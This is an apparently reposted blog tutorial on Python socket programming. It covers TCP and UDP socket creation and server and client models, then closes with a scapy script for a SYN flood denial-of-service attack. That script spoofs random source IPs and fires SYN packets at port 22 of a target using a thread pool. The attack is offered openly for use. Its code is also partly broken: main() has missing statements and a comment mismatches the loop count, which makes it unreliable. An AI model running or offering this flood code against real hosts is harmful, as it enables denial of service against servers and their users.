SYN Flood Attacks Implemented by Python Socket Programming and TCP Protocol

Keywords: Python TCP/IP


Over the years, I have been crawling in the it industry. Along the way, I have summarized a number of high-frequency interviews in python industry. I have seen most of the new blood, and I still have a variety of difficult questions or answers for a variety of interview questions.

So I've developed a treasure book of interviews myself, hoping to help you all, and that more Python newcomers really join the industry, so that Python isn't just about advertising.

WeChat Applet Search: Python Interview Treasure

Or follow the original personal blog:

You can also follow the WeChat Public Number and send interesting and curious technical articles from time to time: Python programming learning

What is a socket

If a host wants to communicate with other hosts over the network, then IP and port will be two essential properties.

TCP, UDP as a means of communication, we also need to maintain the corresponding IP and port (PORT) properties in advance, so an object with IP and PORT properties in the program is called a socket.

The server always opens a port waiting for a connection, and when a client initiates a connection to the server, the operating system also helps us select an available port to use as the sender of the data.

A socket is like a SIM card in a mobile phone. Without it, you can't communicate at all.

Python provides all the methods to access the socket interface at the bottom level of the operating system. Socket is a socket, and we can program the underlying network through the socket module in the program.

There are two main types of sockets, connection-oriented sockets (TCP/IP) and connectionless sockets (UDP/IP).

Create Socket

A connection is required before communication, which is also known as a Stream Socket. Connection-oriented communication provides sequential, reliable, and non-repetitive data transmission. The main implementation of this connection is the Transmission Control Protocol (TCP)

  • TCP Socket Creation
import socket

server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  • UDP Socket Creation
import socket

server = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

TCP/IP Model

Server-side model

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
while 1:
    c,c_addr = s.accept()
    while 1:
        _ = c.recv().decode()
  • s = socket(AF_INET,SOCK_STEAM): create a service-side socket; The corresponding socket properties are IPV4 protocol and TCP streaming protocol.

  • s.bind((', 8080)): Receive IP address and port with tuples as parameters, set corresponding properties for sockets, and choose a port greater than 1024; IP is the current host that can use any IP address, such as (local loopback), (local area network IP), (public network IP); Or you can pass an empty string''directly to bind all available IP addresses.

  • s.listen(5): A service-side socket opens TCP listening, where the parameter value represents the maximum number of connection waits that can be made.

  • s.accept(): Passive blocking waits for the client to connect, if there is a client to connect, then two values are returned; The first is the connected client socket, and the second is the client address.

  • data = c.recv(1024): The server receives client TCP data.

  • c.send(msg): The server sends TCP data to the client.

  • c.close(): The server disconnects communication with the current socket, closes and releases socket resources.

  • s.close(): Used to close sockets and free resources when the server is finished working

When a specific client connects to our server, we will open an additional embedded while loop for specific communication business processing. Under some specified conditions, break can be used to jump out of the business cycle with the client and continue to wait or process the next TCP client connection

Client Model

import socket

c = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
c.connect( ('',8080) )
while True:
    data = c.recv(1024)
  • c = socket(AF_INET,SOCK_STEAM): Create client sockets consistent with connection server sockets
  • c.connect('', 8080)): remote connection through the service-side binding to the IP address being listened on and the corresponding open port.
  • c.recv(1024): Client receives TCP data sent back by server
  • c.send(): client sends TCP data to server
  • c.close(): Close the socket

SYN Flooding Attack Implemented by TCP Protocol

SYN flooding attacks require the construction of a triple TCP handshake packet through a scapy tripartite module in Python. Only the TCP handshake packet with SYN flag bits is needed to construct, send handshake packets to the target host, and achieve the purpose of the attack by occupying the TCP connection resources and CPU resources of the target server.

from scapy.all import *
import random
from multiprocessing.pool import ThreadPool
def func():
    for var in range(10): #Single function sends 1000 SYN packets
        ip_num_1 = random.randint(1,255)
        ip_num_2 = random.randint(1,255)
        ip_num_3 = random.randint(1,255)
        ip_num_4 = random.randint(1,255) #Four-bit Random IP Segment
        sport = random.randint(1024,65535) #Source Random Port
        src_ip = "%d.%d.%d.%d"%(ip_num_1,ip_num_2,ip_num_3,ip_num_4)
        pkt = IP(dst="",src=src_ip) / TCP(dport=22,sport=sport,flags="S")
		#Built TCP Handshake Packet
        send(pkt) #Send to target host
def main():
    tp = ThreadPool(4)
        #Number of thread pools
    for var in range(4):
        #Number of Executing Functions
if __name__ == '__main__':
  • You can view tcp links by command on the target host
netstat -ant

Posted by tmyonline on Thu, 21 Oct 2021 10:46:27 -0700